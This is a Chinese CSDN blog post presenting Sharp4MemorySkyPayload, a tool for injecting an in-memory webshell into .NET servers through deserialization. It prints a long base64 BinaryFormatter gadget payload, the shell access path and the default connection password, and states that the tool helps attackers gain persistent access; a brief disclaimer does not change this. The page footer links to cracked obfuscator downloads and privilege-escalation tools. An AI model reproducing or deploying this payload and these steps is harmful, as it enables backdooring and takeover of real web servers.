.NET 一款反序列化注入天蝎内存马的工具

最新推荐文章于 2024-08-28 09:00:00 发布
最新推荐文章于 2024-08-28 09:00:00 发布
阅读量618 收藏 8
点赞数 15
文章标签: .net 网络 安全 web安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/141123359
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4MemorySkyPayload 是一款专门设计用于通过.NET反序列化注入内存马的工具。这款工具包含的负载通过利用.NET的反序列化机制,能够将一个内存马注入到目标系统的内存中。使用该工具后,攻击者可以通过一个虚拟路径访问服务器,获取Shell路径和服务器的基本信息。

图片

03使用方法

Sharp4MemorySkyPayload 的使用非常简单,只需发送一段BASE64编码的反序列化负载即可,以下是其基本用法的示例。

AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAAGBwAAAPI6PFJlc291cmNlRGljdGlvbmFyeQp4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIgp4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIKeG1sbnM6cz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiCnhtbG5zOnI9ImNsci1uYW1lc3BhY2U6U3lzdGVtLlJlZmxlY3Rpb247YXNzZW1ibHk9bXNjb3JsaWIiCnhtbG5zOmk9ImNsci1uYW1lc3BhY2U6U3lzdGVtLklPO2Fzc2VtYmx5PW1zY29ybGliIgp4bWxuczpjPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5JTy5Db21wcmVzc2lvbjthc3NlbWJseT1TeXN0ZW0iCj4KICAgPHM6QXJyYXkgeDpLZXk9ImRhdGEiIHg6RmFjdG9yeU1ldGhvZD0iczpDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmciPgogICAgICA8eDpBcmd1bWVudHM+CiAgICAgICAgIDxzOlN0cmluZz5INHNJQUFBQUFBQUVBTzFaZVd3YzUzVi9jK3pCbGJnV1Nac1NaVXBlV1pLOWtXbHFTWkV1WlNlMkpCN2lTdVR5MkNVcFNyS3AzZVdJWEdsMlp6MHp5MHYxSWRTT3JjUkpIVlFJM0tEcEViUkYzUVNGNFJhTlVidEJYQVJKalVCQUVpQXRHalNJQThSSWdpQXhrUFJBa3NMcTc3MlpKWmNVcGZpZm9FRGhJZmQ5M3p1K2QzL2Z6T3dPbjM2Uk5DTFM4YmwrbmVnMThxNGo5SnV2cC9HSjN2VVBVZnE3dW10N1hsT0dydTNKekJlY1dObTI1dXhzTVpiUGxrcVdHOHNaTWJ0U2loVktzYjZSZEt4b3pScnQ5ZldSZmI2TzBYNmlJVVdqNXRpcjU2dDYzeVoxenhabEM5Rk9JRUdQOW1RUFFHelZzVzB5VnoyL2lkWkdjVXIxcGhvZGVaWkYrWDl0WEIzazJnZTlVMzdBZjZWdUV1UTVvcTN2SXhjM1hQQXZYSU9HZ1EvVzRPMnVzZVJpZkdhSEp5dXhickFQOHJsMjI3SHo1UHNHSHlYUTF2VnlJQjlwdHczVHl2dStudk4xeFc2UU83YlJ6WE05M2pnb1N3TDBJZ3B6dFlsSWVUOHhibkkxSlhUNmtpTHJHOVE0T2l0aVkxcU94T0YzSkJnUEFGb29hV1JMUE1UVE1JTTZnTzJmUUZXVXBsQkRxUG11ZzU5dENGa1I1cUFISWx2RE5hSmJxMVNySHFDK3JybXpOVnkza1I5bGNCc3Z0VnREVkc3U3cvWnVqQllzUkpvN2JnODMxK0JXQTBDVDNxRGJkNE1VYjJRczBCQ3dqd0R6cEpwOFVzaEJTb05Od1laZy9IYVEvTUd6ZlFmSE9jRFN6ZXRwZnc0YXRQMFQ2OTdPMUEzOHQ1a2g2STVWeGxvZ0xTenlxNXV0UlgrVjR6dFhSZTdjUkdRM2k3VGVVcVFuZklQWDFpNkFBMXpMQUozeFdnbTEzQTJpS2luUjdCZkR0ZG1SckQyQk11dXFlb21IRGRuemFoc0pjbVdEVWxoUFdIK0NOL0NCNEFIcEc1VmdnYytpQmkxK0YyUWlRU20wcDlHcmVZejl5cWthTjFPd1RkMStRSTN2QVVtejdyNFpZeTh6UGxsbDFHdnFKVGJwUUZ0d1ZXWWZ5eXhVWlVLYVUxL0wzYjlPd3hiN0trSjM3bUdpTDZFSHJIc1pqV3cvOERERTR1eXovb1RHa2ZseDdmQzJiWVBzQWZVU3M2d1BZZW9ja0RBUDhKNzVJV1FDbkdmblBzNlB6dm54cG9HMWFaQ25XcnlOelc1c0ZrbDMvSDdNMmg3U2JycGp0b1N3WTdUUVRYZE1KT2dWQ3pzTHhhcVRZbUhidG1PNC80UjZTZHl5RGdLN1I3MFVXRU9DOWgrRi9kMGpXMDRTdk5XVEQxZmxnMnZJZ2QwZWo4ZUFQd1lsWThmU0o0NHAvdW5EWjlsQ1YzdWkvVkRpVU1kaGtneVpmSTVoNmQ0bmliNkE4ZDk1bm5idFFtbk9ZWW5uY1ppOGdjRDJUcVNwcjlFNzYvY2VuMGoyWWN3QVB3TFZlNCtaVnM0L3I5QU95dFFkbjFQcStMejgxZjVEMU95ZGZTMWVQZVQyd3pxUVBEcm9INnNCZjlUOWorTGptbWlNK040SHlhREhnSDJNRmdIL1dPQmZDM3hBMmFzRWFWb1pBRFNVeHlENWFlVUZ6RjhXaXF0bTFDQmRGZmcxOVhYQWYxTlp6LytvSnVEdG1nbjVwTWFyVWhyVFg5Tlk1dzgxNW9aMDVyYnB6TzBST0tTelRFbm9mNk8vSUs1NS9ubFoza2JiSlNMR1ZHQWNkNTNNR1d1VHlEVm9ZT3hoWUEySXVCNzhON0ZPb1dzMThHK1ZZY0MzQkw0RE9CcGpLeC9kOFRvMWdkSjZkeFhiQ2V6M0JQc0tmUWM4alo0WDdESzlneHVXUnE4SzlsWDZCVENkdnU1ajd3RUwwQTk4TEtyc1J6emh2UjdXck54SElickh4MHBLQjA3R0U0SjlOSHhaZVlpMjBQRGVOZXRiNkp3ditWbmxFY1R5ekNwdkVOaWlQSmg4TmZ5R01rWlJlc3JIdmkzWWN6NzJFOEU0Zzl0VXJ2eWQzRVIwYnczY3R1bGNwVU1xZDhuSkdzcWR2c3dZdlk2emRwbzRXM1VDcy9RTjlSd1Y2UHVxZ2ZuUDFZdjBPSVcxeHdGajJnSXRVNXQyaWE3UWhQWVU0S09ZTDVNaGxHWHRXY0RMMnNjQVg5QStDZmdIUXZrVG1iK3NYUVY4UmZzTWZZcStydjBwdFAySDlwZjBoNlRvZzhMOVBDZ3QrcXYwWjdSUC95SzlqTDMyaHREZnhQeXMvcytRdktBM29Rdll3emZwc3Y0OWNIOWZqNEh5a3Y0alFLNWFnMVNyUWFyVUlOWDVFSEYyRzZRMkxUTFAwbC9vUDZXM01QOEZKVVhiSHFGZm9kZjE5d0RmMG5VbFNmK3ExeW50cU5oMndDYUtLZGZRTVQrZ1gwS3pqcXdGWk5kOVR1RzkvWi9LSk9CN0FpUHFKRGdSWkZwRm5WanFOdlFIZDNBZDZVOXZmR0o1dGVZcDB0c1hFekxXMGlKeTdwQm8xT1U1U1I3VlBqeHN6VlpNNDJGeUZ1YXpIWW5PWXZ1c2FWSS9wYlBGc21tTVp0MzVVZHRhS013YXRrK2FMTmh1SldzT0ZFeGpQYVd2WUJ0NTE3S1hxZWprTGRzczVDaTk3TGhHa1VaeUY4RHhzZllwSTFjemJSKzBIQmNuSC9sYTFsbXN0WFdEbFhZZWFHWmhsVTR6NXlIWWE1VmNvK1JTc2xSd0MxbXpzR0pRMG1HdHZnSmliZjFMQmNkMWFGV1pqeDgzWExHRmNjMU9qYSs5MmZ3OCs4cWowV2VVamRLc1VjcXZpdlJhcG9sRkJhdmtVTEsvVkNrYWRqWUhkWDFaMThnVWlxSjM0OUk1dzUzeHJmdGFraU9FbTRHUlJkNGdSVDd6cUcxbmw0Y3dKYmhnenRyZzhOTGVLakxyKzFzd0hHSDAxZUNjRm84NklMUFZSYlZDSHFzbW03WEpYRmdyVHUxOE5RNVdVSEh6YVRkcnI5WjV2Rkp5RVRTeVVpeERsWjAyN0lWQ25zMExJY3Q1R2pmTTdKTE1uS011N29DNWltdVF2NURGd01vVnpJSzd2TWF0OW1uVlRJWmZRdnBMZVd1V0s4TkJUbVFHZW1Da3RHREFtUUhiS2g3TE9zWURYZDRkbG12Z3p3WmR0eXdCUW9Ia3NtTGJIQ3pUeDQzSEs0YmowV3Zudmt6L2twR3ZzTnVjTmNsSzczeldKbDl4eGk0VSswdXpsTEdHckVXME1TODhXaTZiaGJ5RUt2Sko1RzFwNUx6d2hvelNIRWpqUnRGYU1HZ282N2hWYnJxU2N6eWRjQlNySVZNMnMzbUQvRjNUWDBJMXJGS1IzUjQzNXRBZWhyM1pSdkpDY3NySXMrSEg1Q05UZGdGSlpUN1h4N0FuWE1tM0NIa1VHczZXeGVWYVk1T0c3U0FVRWF2TzBhNTJscjN5dHozelJ0SlZMaWVreHJXcW5ZeUZ6SEFidUFYRXp1WElGa3BlczQ3YXhrTEJxc2kyUExic29uT0drU0Y3MmQ4ZFZua21XVUpwc3FJbjZhUXFwamxpOXhmTHdJN096dUpzZTY1bGxIcHBrbzdpZUI3QWUrTThuYVpPSEkyb0VCMEhwUUw4RVBoVittSElYYVJodW9DeGdGVW1qVUxXb2g0NkFlNHh3Qnlkd3JoQWVTclJtT2dwUW8rTDlhY29oUWVqYWJ5SXAyUmRHdElaUEQ0eFBRSCtGR0FGV29xd1Y0U2U0eGd2MEN4R0UvcHlzSmY4TGRoTFEwOFBkRE92aTA0UzUyTUNZeExqVWVoTDRuWTF6cmRkU0I2ajN3RzE0Tk43MTQxNTVJbmxzdERiRFYrUzhOdUZYVjUzVlBMV2kwODNjdGNIUFFYNHRZSlZYZkJsQ240ZndwaUIzUlh3VjZDckE3SVh5Rm5ueDlySTZ6bU9jZWlmZ213QzlDeHNlM2I2a2JjSzlIY0N1N2pxenhEbUxIOWE4dE9CdkEzQ2JnVzBUc2duTUMrQm01QzhEU1BEV2FGM3c0UE1MZnpJK0hsZUVUdUhvWS90RE9Cekd2dzUrSm1ISGhkNnVGOFd4Yy8zcDNjVy9wMkFSOU1TWVZycTVlazlCUmt2M3p5T1NsMHFRczhEbi9EcjRNbTdmajl4LzNJL0xjUGlnT2pOUTM1U3hrT1NoN1RrYVJGMk9hL3I3U2VvVENQZ1dadlVuZnVEK3lrUE82YjRzUXgvSEQvdkp2aDlVaC9QMzBxTlAvMjBCTDA1NEJQUWZPdDhsQ0hQZldjQlAzV0R2VzU0bWdldFcrcDZISHBIZ1YrRUhkd0xwWDg1MzhkcjdKV0JqOTAwbnB2NVVUdE9yL1lMVzVtVmZoOWVyVWNmN0hUQ2FxZlU1UVRraHFSMnkwTHZnSTVwaWNQRTUwSk52ajMvOHZBc0ovdWU0MHRqNWMzMzNkcllqOHF1U0wreFI5UFFzd1FQMk80U3pvZHAyV2VXNkorVVdnekFkcmUvYjAzUTA4QXkwamNwZU9qbE55SDd0eHZ4N

通过.NET反序列化漏洞,Sharp4MemorySkyPayload能够将内存马注入到目标系统的内存中,注入成功后,将返回当前的Shell路径以及服务器的基本信息。

图片

接着,可以通过访问路径 /dotNetMatrix/dotnet.aspx 获取内存马的执行结果,如果返回空白和状态码200,表示注入成功。随后,使用天蝎客户端连接Shell,密码默认设置为 sky,如下图所示。

图片

04基础功能

Sharp4MemorySkyPayload 目前支持多种反序列化格式,这些格式通常存在于.NET框架的序列化和反序列化过程:

BinaryFormatter:.NET框架中最常见的二进制序列化器,用于将对象序列化为二进制流; LosFormatter:一种更灵活的序列化器,主要用于将复杂对象转换为二进制数据;NetDataContractSerializer:在WCF(Windows Communication Foundation)服务中常用的序列化器,允许对对象进行跨应用程序域的序列化和反序列化;SoapFormatter:用于将对象序列化为SOAP格式,主要用于跨平台数据交换。

计划在后续版本中添加对ViewState反序列化的支持。ViewState是.NET中用于保持页面状态的一种机制,通过ViewState反序列化攻击,可能会进一步利用这个工具在Web应用程序中注入内存马。

综上,Sharp4MemorySkyPayload 提供了一种强大的工具,通过.NET反序列化漏洞注入内存马,从而帮助攻击者在目标服务器上获得持久性访问权限。

05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
Java反序列化注入内存
02-09 2565
Java内存总体有Servlet/Filter/Listern/Java-Agent四种,前三种思路都差不多,通过不同方式获取到ApplicationContext/servletContext/StandardContext等对象,然后往ApplicationContext/servletContext/StandardContext注入恶意的Servlet/Filter/Listern,这里通过注入 Filter实现内存。 实现一 通过Thread.currentThread().getContex
VB.NET XML和JSON序列化与反序列化
12-15
在VB.NET编程环境中,XML和JSON序列化与反序列化是常见的数据处理技术,用于将对象转换为文本格式(XML或JSON),以便于存储、传输和解析。这两者都是轻量级的数据交换格式,广泛应用于Web服务和客户端应用程序之间...
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
.NET 7月份红队武器库和资源集合
ahhacker86的专栏
08-07 868
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面。
深入解析 ASP.NETViewState 反序列化漏洞
最新发布
qq_33163046的博客
08-28 1714
在本文中,我们深入探讨了 ASP.NET 中的 ViewState 反序列化漏洞,包括其原理、如何验证漏洞的存在、以及如何修复漏洞。通过全面理解该漏洞的工作机制,我们可以更加有效地保护应用程序免受攻击。ViewState 反序列化漏洞原理ViewState 通过 Base64 编码,将页面和控件的状态信息传递给客户端和服务器。如果 ViewState 未加密或未正确签名,攻击者可以篡改 ViewState 数据并执行恶意代码。验证漏洞存在。
每个.NET 开发人员应该下载的十个必备工具
weixin_30867015的博客
12-04 227
[ 翻译文档 本文适合中级读者 已阅读1288次 ] .NET Tools...每个.NET 开发人员应该下载的十个必备工具原著:James Avery编译:NorthTibet 原文出处:.NET Tools:Ten Must-Have Tools E...
ob混淆解密在线工具
hello world
10-12 6606
地址: 解混淆测试版V0.1 开头定义了一个大数组,然后对这个大数组里的内容进行位移,再定义一个解密函数。后面大部分的值都调用了这个解密函数,以达到混淆的效果。 这种代码即为ob混淆,不仅变量名混淆了,运行逻辑等也高度混淆,难以理解 ...
Windows提权辅助工具
LuckySec
04-24 1061
0x01 工具介绍 该在线提权辅助工具收录了微软所有Windows权限提升以及命令执行资料,并实时更新,并且可以根据systeminfo信息找到未修补的漏洞和已经修补漏洞。 在线工具地址:https://i.hacking8.com/tiquan 0x02 工具使用 首先搜集Windows系统的补丁号或者systeminfo信息 然后将其systeminfo内容复制到在线辅助工具文本栏里 等待查询结果,即可看到目标系统可能存在的提权漏洞相关信息 ...
C#使用Json.Net进行序列化和反序列化及定制化
12-31
.Net阵营中,Json.Net是由官方推荐的高性能开源序列化/反序列化工具,其官方网站:https://www.newtonsoft.com/json; 一、将对象序列化为Json格式字符串 首先是正常的序列化操作,对于给定的类: private class ...
C#或.net json序列化反序列化,适用于与第三方系统做接口用
05-24
C#或.net json序列化反序列化,适用于与第三方系统做接口用,实体自动转json字符串,json自动转视图
ASPNET中JSON的序列化和反序列化的方法
10-21
通过这个类,我们可以创建一个序列化辅助类,如示例中的`JsonHelper`,它包含两个泛型方法:`JsonSerializer`用于序列化,`JsonDeserialize`用于反序列化。 为了使用`DataContractJsonSerializer`类,你需要引入...
强大的端口重定向工具FPipe.exe(内网提权)
11-28
教程网上找下吧,这个是纯程序,欢迎下载,欢迎使用~
Crypto_Obfuscator_For_.Net_2015_Build_170126_
09-23
Crypto_Obfuscator_For_.Net_2015_Build_170126_,为印度Crypto_Obfuscator_For_.Net软件最新版本,内附破解文件,覆盖即可,亲测可用。
.net 反混淆工具
06-25
.net反混淆工具 Xenocode反混淆 工具
Crypto.Obfuscator.For..Net.2011.cracked-SND
04-24
Crypto.Obfuscator.For.Net.2011.cracked
反混淆-.net反混淆工具
04-17
xenocode 反混淆 .net反混淆 反混淆工具 反混淆器
.Net混淆工具和反混淆工具
a616735104的博客
03-05 1497
一、简介   本文给大家列举一些常用的.net程序反破解代码混淆工具。同时也列取一些反混淆工具。 二、混淆工具 Agile.NET (aka CliSecure) Babel.NET CodeFort CodeVeil CodeWall CryptoObfuscator DeepSea Obfuscator Dotfuscator .NET Reactor...
.NET 一款反序列化打入冰蝎内存工具
ahhacker86的专栏
08-02 987
Sharp4BehinderWebShell 是一款利用.NET反序列化漏洞内存中植入冰蝎WebShell的工具。通过这种方式,可以使用冰蝎客户端连接内存获取WebShell,并且支持在.NET预编译环境下使用。以下是对该工具的详细介绍,包括其使用方法和代码解释。
Crypto Obfuscator For .Net Version 2012 R2 Build 120922
Linhanshi Blog
09-24 2532
Crypto Obfuscator For .Net Version 2012 R2 Build 120922 Download Free Trial http://www.ssware.com/cgi-bin/vrd.cgi?u=cryptoobfuscator/cryptoobfuscator.exe&c=cryOBFDL
***:.NET对象反序列化攻击工具
YSOserial-1.35(exe)是一个针对.NET平台的工具,专门用于构造恶意序列化数据,目的是作为概念证明(Proof of Concept, PoC)来展示不安全.NET对象反序列化漏洞所带来的风险。在.NET应用程序中,反序列化是将序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值